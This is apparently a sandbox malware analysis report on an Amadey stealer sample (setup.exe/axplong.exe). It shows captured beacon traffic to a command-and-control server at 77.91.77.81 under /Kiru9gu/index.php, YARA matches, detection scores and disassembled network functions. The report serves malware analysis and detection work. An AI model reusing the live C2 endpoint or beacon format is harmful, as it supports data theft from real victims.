Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49883	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:21.351535082 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:22.077610016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	49884	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:22.205101967 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:22.893599987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	49885	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:22.909430027 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:23.636791945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	49886	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:23.749670029 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:24.446239948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	49887	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:24.501204967 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:25.235282898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	49888	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:25.443507910 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:26.115308046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	18:24:56
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setup.exe"
Imagebase:	0x360000
File size:	1'942'016 bytes
MD5 hash:	EAA443F37443CB7221D63E0891243384
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1701798029.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1661502263.0000000004930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:25:00
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Imagebase:	0x1000000
File size:	1'942'016 bytes
MD5 hash:	EAA443F37443CB7221D63E0891243384
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1699386717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 73%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:25:00
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
Imagebase:	0x1000000
File size:	1'942'016 bytes
MD5 hash:	EAA443F37443CB7221D63E0891243384
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1740305349.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1699458271.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 04B2034E Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cec124f60ad98d5d16e41d3ac8b59856779ea0284c72d0fc41967f55695339
Instruction ID: 513fa2d7b55283f19d253b0f1da20074473532298c4dc6667f082670ec16793d
Opcode Fuzzy Hash: 57cec124f60ad98d5d16e41d3ac8b59856779ea0284c72d0fc41967f55695339
Instruction Fuzzy Hash: 5401C2AB34C530BEA101A4891B145BB663EB2DE231730C4A6F75FC4503F19826597331

Function 04B20313 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7733a53f9c9c19ebbddf0301b145264f5675d3ed5d1042eb5039df49200d25d4
Instruction ID: 027671335021bfada868af44c99b1116be59ab92550ec4a443b22c2de9549806
Opcode Fuzzy Hash: 7733a53f9c9c19ebbddf0301b145264f5675d3ed5d1042eb5039df49200d25d4
Instruction Fuzzy Hash: 3A21F7AB24C531BEA202A5951B545B77B3AE5DE231330C4E6F74FC9503F199264D6332

Function 04B20307 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1b71e7fc3fdaaf0ddae67705025a258636314c891b744a72810adc7604fdc52
Instruction ID: ef13525bb5b8ab2233d570d481a9c563e7efe4f0c88e5ded946edc7c49123f9b
Opcode Fuzzy Hash: b1b71e7fc3fdaaf0ddae67705025a258636314c891b744a72810adc7604fdc52
Instruction Fuzzy Hash: C81172BB34C531BE6101A5861B549BB673EF5DA231330C4A6F75FD5403F29426597331

Function 04B20378 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dce2d1928164b82c074fa68d8f7af325b7e92af69573bb8b2c2e516cc84da0b
Instruction ID: 8b20c347de9fefa0c5f2f0f6a95e40d1fd05a67f4b15ecd7804ab6b67c7b81a9
Opcode Fuzzy Hash: 5dce2d1928164b82c074fa68d8f7af325b7e92af69573bb8b2c2e516cc84da0b
Instruction Fuzzy Hash: A91124AB34C531EEA101A9961B50AF76B3AE7DE230731C89AF78FC5013F194664A7331

Function 04B20354 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ce41c06226eb8a7367430bf16f84aea7532dfdb0731b4f45d6a8569c94dc89
Instruction ID: 2d0b40f9d3be3dbd07efdb138ebbd3d44bc552160598063dbf618cfcbd776b27
Opcode Fuzzy Hash: 90ce41c06226eb8a7367430bf16f84aea7532dfdb0731b4f45d6a8569c94dc89
Instruction Fuzzy Hash: 9C11D3AB34C531BDA101A58617146FB6B3AF6DA231730C4A6F75FC4513F19422597371

Function 04B2036B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575da01ecc575928a5ceda70367430ab050c4dd1718fdf811e34135e8c353cb6
Instruction ID: 59e654ff3eab2ca892e727267c9bac6396849290e3ffe24a2043e43732c4c34d
Opcode Fuzzy Hash: 575da01ecc575928a5ceda70367430ab050c4dd1718fdf811e34135e8c353cb6
Instruction Fuzzy Hash: F601C4B734C530BEA101B9891B149BB763EE6DA231730C5A6FB5FD4003F29866597331

Function 04B20395 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f72d46784e75a76a1755489a1e0dc2e758e795f9e65101b97f2c05807566114
Instruction ID: 47eb39dff545a0c266df1afddc19120a7b463aeb5210c23872e8678534e41ed0
Opcode Fuzzy Hash: 1f72d46784e75a76a1755489a1e0dc2e758e795f9e65101b97f2c05807566114
Instruction Fuzzy Hash: 6F01D2A734C530BD6102A8891B54ABA6B3EF6DA231330C4A6FB5FD4503F28866197331

Function 04B203B9 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3fdef7430b485d14f48d46914f00e0333b5f9c43aba0e81bb943808f60f5d3
Instruction ID: 3cc1eb14110b29f120906ce46559315c44a7f886a9474b448a6edc8a7fb09798
Opcode Fuzzy Hash: 5c3fdef7430b485d14f48d46914f00e0333b5f9c43aba0e81bb943808f60f5d3
Instruction Fuzzy Hash: A1019EB734C531BDA201A4992B55AFAA63EE1DA230370C0A6F61BC1503F28852593231

Function 04B203A5 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6991e1af1125523e682605a38cd68c0718e0f4be95d4fcefa0a8db5b8934d2
Instruction ID: e4a0d21c7bf37e880257b471a93ddec19d7623acaaad99bed1098cc2ce454e9a
Opcode Fuzzy Hash: db6991e1af1125523e682605a38cd68c0718e0f4be95d4fcefa0a8db5b8934d2
Instruction Fuzzy Hash: EA01B1AB34C530BDA101A4992B15AFA673EF1DA231330C5A6F75FD4903F288260E7332

Function 04B203E1 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b99c2e31f4617016cecdc8696c1f3cf66796b066a34e3898ddd2d26662315d1
Instruction ID: 6a2627bc51962d1610bc639be8e0fccb1e13d19bae3a28ad1a73a7227c42c27f
Opcode Fuzzy Hash: 0b99c2e31f4617016cecdc8696c1f3cf66796b066a34e3898ddd2d26662315d1
Instruction Fuzzy Hash: 91F044A734C531BD7101A5992B15AF6673EE1D6231370C4A7F71FD0503B188175D3232

Function 04B203FC Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ac94267b12d1d82862e74989b0a56e24e1191f89ab4c3ea04cfe2778aa60c61
Instruction ID: e8bd41886d5da698491934d66ea4c71b0dff233ae5901889ef0eb5c8b87619f5
Opcode Fuzzy Hash: 6ac94267b12d1d82862e74989b0a56e24e1191f89ab4c3ea04cfe2778aa60c61
Instruction Fuzzy Hash: A7F062AB34C531BD7001A59A2B156BA673EE2D6231330C5A7F65FD0503B188171E3232

Function 04B203EC Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e55b5e152a04f6f552d367973efbdb7bc85c8de785f71d498fc704f2dea367
Instruction ID: 8d8383bf183c4fc8255d9ede8096bb786db37dc37dddcbd138dd41b81f751c69
Opcode Fuzzy Hash: 27e55b5e152a04f6f552d367973efbdb7bc85c8de785f71d498fc704f2dea367
Instruction Fuzzy Hash: 56F0C2AB34C930BCB001A98A2B159BA673EE1D6231370C5A7F65FD0503F288271E3332

Function 04B20471 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488beb24d954254fd6e8b62ad246d765afcff492dba28f1880546a7ef0b11f8f
Instruction ID: 1e38033288f594fd3d0cf6f858678b5bc6ffc762d87159ab3df854289880054b
Opcode Fuzzy Hash: 488beb24d954254fd6e8b62ad246d765afcff492dba28f1880546a7ef0b11f8f
Instruction Fuzzy Hash: DDF0BBA734C9309ED102E95967652F5AB39A79A231730C5A2F35FD2653B1C8234E7331

Function 04B20414 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce1fb87a465fd5ba65acbdba48d74a3be2b5d895e6eda484256e465432ab355
Instruction ID: 14dc315f70ef73093cbb8e3efa82c3c5c67446be5b3b2934ab5ff68593ff3da3
Opcode Fuzzy Hash: cce1fb87a465fd5ba65acbdba48d74a3be2b5d895e6eda484256e465432ab355
Instruction Fuzzy Hash: A8F0E06734C9309D9101A55967552F56B39A7DA231630C5A2F35FD1543B1CC134E7332

Function 04B20435 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f40c5b5cd6e6470b9193c0e694c43e2b6c68b8adf587584a62f8b8da742b25f3
Instruction ID: 5178b3f6a59318325c5e1f4bc5c516f71355d1fd7832365c24a280deb18cb876
Opcode Fuzzy Hash: f40c5b5cd6e6470b9193c0e694c43e2b6c68b8adf587584a62f8b8da742b25f3
Instruction Fuzzy Hash: D1F0273378CA609E8201E9A993451357B35B65E136330C0AAF35FC1513A1481219B322

Function 04B20496 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e872406a5d923cd3abb9f2a3dd479c2f184561e8e1535df8f3cb862c82f66526
Instruction ID: 2e93e9f78fe72323bd968dff26940886fcca12a7cbffbdc46ad27f0b8ab79dbc
Opcode Fuzzy Hash: e872406a5d923cd3abb9f2a3dd479c2f184561e8e1535df8f3cb862c82f66526
Instruction Fuzzy Hash: A4F0272368CE308DC242F69D43052357A36B79A232734C1A7E36FC0903B148225DB322

Function 04B20459 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704264529.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b20000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a24ec99e49fb2e6a43211abb88a4b288f5fc55eece4d070ec82b255dc111cfb
Instruction ID: b11fc4f290d12dfaa0d160d2b2c1118b83fbd2b16c6d6034c94125730eddbd84
Opcode Fuzzy Hash: 6a24ec99e49fb2e6a43211abb88a4b288f5fc55eece4d070ec82b255dc111cfb
Instruction Fuzzy Hash: 49E0D88278CE30558182345D07482756A39A6AF036230C2E2E3AF94A53B48D235A7361

Analysis Process: axplong.exePID: 7548, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.2%
Total number of Nodes:	600
Total number of Limit Nodes:	43

Executed Functions

Function 0100BD30 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(01058D18,00000000,00000000,00000000,00000000), ref: 0100BDBC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0100BDE1
HttpOpenRequestA.WININET(?,00000000), ref: 0100BE2B
HttpSendRequestA.WININET(?,00000000), ref: 0100BEEB
InternetReadFile.WININET(?,?,000003FF,?), ref: 0100BF9D
InternetCloseHandle.WININET(?), ref: 0100C077
InternetCloseHandle.WININET(?), ref: 0100C07F
InternetCloseHandle.WININET(?), ref: 0100C087

Strings

StYMTE==, xrefs: 0100BE03
invalid stoi argument, xrefs: 0100E3D4
stoi argument out of range, xrefs: 0100E3CA
9wGTaHilQw==, xrefs: 0100C2BB, 0100C513
9wGTaLGWQy9=, xrefs: 0100C355
SbKm, xrefs: 0100D4E6

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 9wGTaHilQw==$9wGTaLGWQy9=$SbKm$StYMTE==$invalid stoi argument$stoi argument out of range
API String ID: 688256393-230317815
Opcode ID: 66440cfbfdccca3d77fe46035003880e52c2e0d3dd35706d46928d44424e9600
Instruction ID: 721a6f1345c194c61f38b046b639b1619d0eeb1b376b9c2ddaaa1363db692f20
Opcode Fuzzy Hash: 66440cfbfdccca3d77fe46035003880e52c2e0d3dd35706d46928d44424e9600
Instruction Fuzzy Hash: 8FB1C0B1A001589BFB25CF28CD84BEEBBB9EF41304F504298EA48972C5D7759A80CF94

Function 01014690 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 01017840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0101792C
Part of subcall function 01017840: __Cnd_destroy_in_situ.LIBCPMT ref: 01017938
Part of subcall function 01017840: __Mtx_destroy_in_situ.LIBCPMT ref: 01017941

Part of subcall function 0100BD30: InternetOpenW.WININET(01058D18,00000000,00000000,00000000,00000000), ref: 0100BDBC
Part of subcall function 0100BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0100BDE1
Part of subcall function 0100BD30: HttpOpenRequestA.WININET(?,00000000), ref: 0100BE2B

std::_Xinvalid_argument.LIBCPMT ref: 01014E72

Strings

aRFZ, xrefs: 01015467
wNZ, xrefs: 01015321
e76b71, xrefs: 01015459
XvPZ, xrefs: 01015373
246122658369, xrefs: 01014F0A, 01014F1D, 01014F5F, 01014F69, 010154C4
stoi argument out of range, xrefs: 01014239, 01014E7C
R2Z, xrefs: 010152ED
LrTsKE==, xrefs: 01015489
WMxZ, xrefs: 010153EE
aSF2aA==, xrefs: 010146E2
NvB+, xrefs: 01014746, 010147BD, 01014A65, 01014ADC
NvF+, xrefs: 0101478D, 010148BC, 01014AAC, 01014BDB
a9P=, xrefs: 01016353, 01016622
avBZ, xrefs: 010153C5
bLTZ, xrefs: 0101539C
WMNZ, xrefs: 0101534A
SBZ, xrefs: 01015440
9LFZ, xrefs: 010154D2
bcBZ, xrefs: 010154AB
Gl==, xrefs: 0101366E, 01014CFD
Wb Z, xrefs: 01015417

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
